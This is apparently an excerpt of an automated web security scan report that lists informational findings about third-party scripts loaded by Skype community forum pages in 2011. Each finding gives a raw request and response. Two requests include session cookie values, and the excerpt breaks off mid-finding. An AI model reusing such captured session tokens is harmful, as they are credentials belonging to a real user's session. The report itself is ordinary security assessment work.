<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.278. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/kudos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.279. http://community.skype.com/t5/help/faqpage/faq-category-id/participation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/participation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/participation HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:23 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 43144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.280. http://community.skype.com/t5/help/faqpage/faq-category-id/personalization  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/personalization

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/personalization HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:23 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 48232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.281. http://community.skype.com/t5/help/faqpage/faq-category-id/pm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/pm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/pm HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:26 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 48182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.282. http://community.skype.com/t5/help/faqpage/faq-category-id/posting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/posting

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/posting HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/registration
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 44205
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.283. http://community.skype.com/t5/help/faqpage/faq-category-id/qa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/qa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.284. http://community.skype.com/t5/help/faqpage/faq-category-id/registration  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/registration

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/registration HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/help/faqpage
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:19 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 44589
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.285. http://community.skype.com/t5/help/faqpage/faq-category-id/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/search HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 46884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.286. http://community.skype.com/t5/help/faqpage/faq-category-id/solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/solutions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/solutions HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 42075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.287. http://community.skype.com/t5/help/faqpage/faq-category-id/tagging  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/tagging

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/tagging HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 43929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.288. http://community.skype.com/t5/help/faqpage/faq-category-id/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/help/faqpage/faq-category-id/video HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.289. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.290. http://community.skype.com/t5/iPhone/bd-p/iPhone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/iPhone/bd-p/iPhone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/iPhone/bd-p/iPhone HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.291. http://community.skype.com/t5/tag/%20facebook/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/%20facebook/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/%20facebook/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: " faceb
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.292. http://community.skype.com/t5/tag/Android/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/Android/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/Android/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Androi
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.293. http://community.skype.com/t5/tag/Skype4COM/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/Skype4COM/tg-p/category-id/English

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/tag/Skype4COM/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 120737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Skype4
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.294. http://community.skype.com/t5/tag/Sound/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/Sound/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/Sound/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
